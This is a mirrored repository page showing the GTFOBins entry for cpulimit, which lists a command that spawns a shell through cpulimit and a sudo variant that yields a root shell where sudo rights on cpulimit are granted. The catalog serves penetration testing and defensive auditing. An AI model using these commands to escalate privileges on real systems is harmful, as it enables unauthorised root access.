1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-18 13:31:34 +01:00
GTFOBins.github.io/_gtfobins/cpulimit.md
2018-10-05 18:55:38 +01:00

8 lines
119 B
Markdown

---
functions:
shell:
- code: cpulimit -l 100 -f /bin/sh
sudo:
- code: sudo cpulimit -l 100 -f /bin/sh
---